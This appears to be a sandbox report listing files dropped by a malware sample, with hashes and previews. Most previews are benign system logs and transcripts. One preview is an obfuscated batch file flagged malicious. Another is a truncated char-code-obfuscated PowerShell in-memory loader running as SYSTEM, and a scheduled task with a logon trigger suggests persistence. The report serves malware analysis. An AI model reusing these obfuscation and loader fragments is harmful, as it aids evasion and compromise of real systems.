                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4553
                            Entropy (8bit):5.349222050408134
                            Encrypted:false
                            SSDEEP:96:BZtsZ+NTyyqo1ZhZ9sZ+NTyyqo1Z0povTueovTuuZMsZ+NTyyqo1ZppovTueovTV:0EBEK
                            MD5:784CCEAD8246F1D9B0B0233774243374
                            SHA1:05C1B6AB474713446F3310C5463A8BB5CD0FBD08
                            SHA-256:94F81DCB3AA9BF4A2E7261F0735FBB15445C9F72AA3CDEE6E6D7006D898A7CA2
                            SHA-512:093EC3633FDCCBAE61C3DEA292499ADBC9490DEFF9D134C5D19925D4BAE5E14690778FCD00D139B9BF27E46C475E417DB5C5A81D90D1F1EAF4EC442C3D12E7E7
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034233..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034303..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5117
                            Entropy (8bit):5.637283607772319
                            Encrypted:false
                            SSDEEP:96:BZGsZ+NTryqo1ZhZOsZ+NTryqo1ZfpovTueovTukVt7vBpB6a5xY595f8bus3wMp:9E653b5xY595f7s3wMcjIiIIit
                            MD5:141D50A8BBC12D18153D981E74F7421B
                            SHA1:229EFFB65263021AA2609644FC85BC7DCC1886FD
                            SHA-256:6BD9C223DF78316DB7E1C4D348D1B1C5E61CB97F0B01B9807C41AD3B34B3D59C
                            SHA-512:DB76B41B4BCEB8FA968CD4E76FF426FC23E9110F6A2C0D1E0BDF32A0309B709E12DD2510C01D9EAAAD0E9B3FEC0FC9BF6AF365215835F98EAB796544D9C824F4
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034203..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034311..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5125
                            Entropy (8bit):5.642366220416972
                            Encrypted:false
                            SSDEEP:96:BZ/sZ+NTUyqo1ZhZNZsZ+NTUyqo1ZOpovTueovTuOVt7vBpB6a5xY595f8bus3wJ:5AEY53b5xY595f7s3wM5IiIIit
                            MD5:3AD5707222C23F76FFDF0619C8AC6D25
                            SHA1:453EA743B95692E13F665F8F0EC46B3BBBAA0C4D
                            SHA-256:EBA01D3DF9AF7A904BB764BBA987782A74E2252D9F315D5EFFC6304FDB2E6288
                            SHA-512:08A607B366A901B62CD32BE7DDC373CDC33ABFFA16BF3A90783C87B301DE2DA4F59B8F9E594BAE0FAC150CB409EE8A02DCEC178E850660F358FC45DFA999A677
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034257..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034327..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5214429
                            Entropy (8bit):6.008710946572079
                            Encrypted:false
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            MD5:19FC666F7494D78A55D6B50A0252C214
                            SHA1:8876CD520507CBFDC2E89E449BABA52232A1DF1B
                            SHA-256:E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
                            SHA-512:94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
                            Malicious:true
                            Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (5360), with CRLF line terminators
                            Category:dropped
                            Size (bytes):11484
                            Entropy (8bit):5.34259826985146
                            Encrypted:false
                            SSDEEP:192:NIvawYQo0dZcT2IUwB2IvawYQo0dZcT2IUwBS:NIvpYl0oD2IvpYl0oDS
                            MD5:5AD398834C8E25723975DED4B2D02597
                            SHA1:5EA89BAD95268DA60FF5123220E5C6E9592605B4
                            SHA-256:A7E6F5069C4185EC5523D5951C49C9034A91ACC6F367B022A52CB72424CE0558
                            SHA-512:981A90B488F64FBB54CCE44BE5A8361CEE66696D46DA6145DD99BFD5D7D9656D095DAB58EB8CB9BB1BD28C4C95917A9872B66D08E568CF2977603536EA10F659
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034312..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](10
                            Process:C:\Windows\System32\svchost.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3488
                            Entropy (8bit):3.5872466257032647
                            Encrypted:false
                            SSDEEP:48:yei1q97SfeQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXI:t2nkp2Gdi3ipVA9ll7EhAMz3cHtr+
                            MD5:3D2655B2FBBD4D24033DBB79B921697C
                            SHA1:08CE2A84327E1EEF614008809F15A9F126B28A05
                            SHA-256:2CFED75D94EC6FC435D61F370CCA3D40E910A8FB10A97D45D51FFEE0F87A7793
                            SHA-512:F261B1727096BBF17F97402A5F7D19C46F5481227E50AD43294C935C13CBB6494F1DD068E2FA5DC26F10926600D2E17289C44785518936C69A5A7670A0D68182
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.4.T.0.4.:.0.1.:.4.7...9.8.9.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.Q.g.S.1.M.4.P.T.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul4/h:NllU
                            MD5:C31A1BA17DD8856E8E930807FA308CBE
                            SHA1:96AAFF7B013066D2EDA2958128FD049915028849
                            SHA-256:91620CED47374C83D43981E1930EF7C78B6E7651F108F6CB18A60CAE8487E1CF
                            SHA-512:6D6AB14A905EC859D23B2C2BA163A144FB35162AA05CFF85478291C0562085B8569A706B2A7A28CA97C958BE2FC3840CEBA99D212CB317CD5176784B194DAA59
                            Malicious:false
                            Preview:@...e................................."..............@..........
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:modified
                            Size (bytes):950
                            Entropy (8bit):2.8937402169492104
                            Encrypted:false
                            SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
                            MD5:9D007E669CE25371EE9401DC2AC21D2A
                            SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
                            SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
                            SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
                            Malicious:false
                            Preview:// Copyright (C) 2000 Microsoft Corporation // Module Name: WmiApRpl // Abstract: Describes all the counters supported via WMI Hi-Performance providers [info] drivername=WmiApRpl symbolfile=WmiApRpl.h [languages] 009=English 009=English (UTF-16 preview decoded; banner lines of slashes omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):78200
                            Entropy (8bit):4.069487817829082
                            Encrypted:false
                            SSDEEP:768:4k3WxWwWLvOUZucxvbNp8CCcicolb/AjQwEPnPK0xvFk3WxWwW8:dLkctNp8TcG/Ajs7C8
                            MD5:35F5E61B44C99E5961D791D65DD17821
                            SHA1:EEECB77D0C11E84E03F3A3D8D32DA60B0C425431
                            SHA-256:B6B776F4A27841D857B1CC867F758A0616F9774142F2A55DDB3A2440934D6BA3
                            SHA-512:69772C98E379465695ED3970FF245780716E8EB877E4B7211A731953777555A7F40402DAFB05B541C53508CB3411C60C3F95EB1025E177A3D249BEF5CD15BDEF
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: powershell.exe 10.0.19041.546 7eda4115 unknown 0.0.0.0 00000000 00000000 00007ffd9bbd1c63 12dc 01db1631076114df C:\Windows\System32\WindowsPowerShel (preview truncated); raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.2559303785119753
                            Encrypted:false
                            SSDEEP:384:8he6UHi2uepX7xasnPC3FzFtpFDhFPFyF8422:8VUHiapX7xadptrDT9W84N
                            MD5:8EF6E9746DE72295DFCB3197A49966C3
                            SHA1:3FF34508B83382569DF87C14DDFF8596D1E29980
                            SHA-256:BEBF782FCDAD337843593DEE32D030C922424367A50078E30329BE63259E648A
                            SHA-512:0F0690586ACE4A7D37D948805FD2464D8ED5A1B42CE42F68F607072B5836B7CB2032F468FC1C1E921C8FB097694DDD3BE2821D193B73E5552A45F253816DB513
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.010692427789071
                            Encrypted:false
                            SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                            MD5:26C4C5213F3C6B727417EF07207AC1E0
                            SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                            SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                            SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.178919462156868
                            Encrypted:false
                            SSDEEP:384:ohfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVF:ohfKm3t
                            MD5:EE25A9478FAB4FBAB6D89F9F2E7C7EF4
                            SHA1:643403023901E8CB6CB7AE3269A883C2BA3CC4C7
                            SHA-256:699618BC087165CE1AC1F7BE088642E80AA920F351D74DDD3454FA2BFA37C374
                            SHA-512:A13D249D057F6899FB8074B01AEB5A367CC0F36664E4CE479D0EB61A6823ADBBED0D44ADECE4BAE7F5E82AA34B31C02A6E4F3D89827809B39089064F09D01AD9
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.428104610855212
                            Encrypted:false
                            SSDEEP:384:UhTm5mcdmNQDmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:UBdD6CL49mVpgwQFQ
                            MD5:D6AA1FCD43790A397134C5CFC5A86D46
                            SHA1:3F8C5749681331F3316BAEE46632ECDA80712CED
                            SHA-256:C3DA75ABD049DCEDF544ED37E2F12F71ACF2B6C7B0E4E8B13209415F831D266A
                            SHA-512:50872703EC944464CFC5B52813E5AEEB9DA101037C1C641A872F311750DE47DD04885DA3856E30030C2CAA5D5DE2A1CABD290B80CAFAD986C87A9CA8501A152E
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.3524106147187157
                            Encrypted:false
                            SSDEEP:48:MiEWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHywdHLP7jM0MckH58yj:SNVaO8sMa3Z85ZMLtrjja3Z85Zu
                            MD5:C665BB87978EBBDC71354545579E80C0
                            SHA1:CC7F6C571B7198162112AF051CDD8B88FF24A626
                            SHA-256:DBBA0D6AEE8D46D3D7EDE566ED4EB6356B8C9D914258DE3B7C8BDECDF2C13325
                            SHA-512:1EE6B50575CDEDCACFF2F3BA500ECD9AA1F898AA04DF792F80CF6BECF6BB9C7905A63D28EEB9E54E1BBAC7EEF564E517112D6DF538E068A1144D516176EA0252
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.014860518194814
                            Encrypted:false
                            SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                            MD5:4FB8E2CF8B3F20534836684947962DC2
                            SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                            SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                            SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.15655690871689
                            Encrypted:false
                            SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                            MD5:2DE60575CB719BF51FAB8A63F696B052
                            SHA1:BD44E6B92412898F185D5565865FEA3778573578
                            SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                            SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):72208
                            Entropy (8bit):2.2541241390870326
                            Encrypted:false
                            SSDEEP:384:+oroay5oQoay/oioaykoBoay+o/Doay9hdo69CcoTorNorWorbvorTorZorQorNd:dmDCYdAruMx
                            MD5:EE1D987C758D86C483BAFBEA2EDEACFA
                            SHA1:AED9B378A9200B09637BE24A9ED6F85E3E632EE6
                            SHA-256:2D7FB5C71035E8C85B1B98772FAC93D8F72E49853A5D68D1CE2F41E7B8EA5466
                            SHA-512:32337026938236CA9078FFE22989E307933986910680B0AEDA0432AECF5AE7EB2237901E09A2E4E3772020F9DE6C30FCB0B7B0F4BF10FCA0C954D6AD102E1700
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Microsoft-Windows-CodeIntegrity, Microsoft-Windows-CodeIntegrity/Operational, \Device\HarddiskVolume3\Users\jones\AppData\Local (preview truncated); raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8524226245257144
                            Encrypted:false
                            SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                            MD5:B8E105CC52B7107E2757421373CBA144
                            SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                            SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                            SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8432997252442703
                            Encrypted:false
                            SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                            MD5:39EE3557626C7F112A88A4DE12E904C1
                            SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                            SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                            SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.9958304436685177
                            Encrypted:false
                            SSDEEP:384:ghqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28g:gbCyhLfIXBS50G
                            MD5:139666E45F01B24FAF6F0BBD3C472C73
                            SHA1:FFA815ED1A88F4E54C2DECE84DD0427E74D23AB1
                            SHA-256:679A66239AE8631182914EFA619C38FA70FBE8D2119303D56039FE0D23BB32ED
                            SHA-512:92A4FA069765BC44125B489A7BF8E4B37EB1EBA6B0F3F2F49B151CDEA67B6DA6F06FB412C5A1CB74F93CBFBBB406D945A61E39AABD1BAC416616ADB78FC51B1D
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.838106263184782
                            Encrypted:false
                            SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                            MD5:A2D41740C1BAF781019F282E37288DDF
                            SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                            SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                            SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.634418630947688
                            Encrypted:false
